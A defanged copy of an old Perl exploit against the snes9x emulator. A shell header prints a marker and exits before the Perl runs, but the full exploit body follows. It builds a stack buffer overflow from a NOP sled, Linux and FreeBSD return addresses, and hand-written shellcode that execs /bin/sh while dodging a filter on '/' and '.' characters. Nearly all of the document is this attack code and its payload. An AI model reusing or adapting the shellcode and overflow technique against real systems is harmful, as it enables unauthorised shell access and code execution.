#!/bin/sh
echo DEFANGED.3
exit
# NOTE(review): defanged copy. Executed through the sh shebang above, the
# file prints DEFANGED.3 and exits before any of the Perl text below is
# reached; invoked directly under perl, the unterminated shell lines above
# are presumably a syntax error. The Perl body is retained only as
# historical reference text and is not reachable as written.
#!/usr/bin/perl
#
# snes9x exploit written by zillion@safemode.org
#
# (safemode.org)

# Option parsing: -l selects the Linux value, -f the FreeBSD value (see usage()).
while($_ = $ARGV[0], /^-/) {
    shift;
    last if /^--$/;
    /^-l/ && do { $esp = 0xbfffaadc; };    # Linux
    /^-f/ && do { $esp = 0xbfbfab4c; };    # FreeBSD
}

# Neither option given: print usage and exit.
if(!$esp) { &usage; }

#############################################################################
# Home brewn shellcode that does an execve of /bin/sh. Because the buffer
# is being filtered for '/' and '.' the shellcode has -bin-sh in it. The '-'
# chars are changed to '/' at runtime ! (hint, check inc and man ascii)

$shellcode = "\xeb\x33\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d".
"\x5e\x08\x89\x5e\x0f\x89\x46\x13\x8a\x06\xfe\xc0\xfe\xc0\x88".
"\x06\x8a\x46\x04\xfe\xc0\xfe\xc0\x88\x46\x04\xb0\x0b\x89\xf3".
"\x8d\x4e\x0b\x8d\x56\x13\xcd\x80\xe8\xc8\xff\xff\xff\x2d\x62".
"\x69\x6e\x2d\x73\x68\x23\x2d\x69\x23\x41\x41\x41\x41\x42\x42".
"\x42\x42\x43\x43\x43\x43";

#############################################################################
# Preparation of the stuff we will put in our buffer

$buf = 87;
$rest = 4002;
$nop = "\x90";
$offset = 1000;

for ($i = 0; $i < ($buf - 16); $i++) { $buffer .= $nop; }

$new_ret = pack('l', ($esp + $offset));

for ($i = 0; $i < 16; $i += 4) { $buffer .= $new_ret; }

for ($i = 0; $i < ($rest - length($shellcode)); $i++) { $buffer .= $nop; }

$buffer .= $shellcode;

#############################################################################
# Done ! now let kick some ass !

print("New return address: 0x", sprintf('%lx',($esp + $offset)), "\n");

exec("./snes9x '$buffer'");

# Prints the two supported invocations and exits; called when no option is given.
sub usage {
    print "\nLinux usage: $0 -l\nFreeBSD usage: $0 -f\n\n";
    exit;
}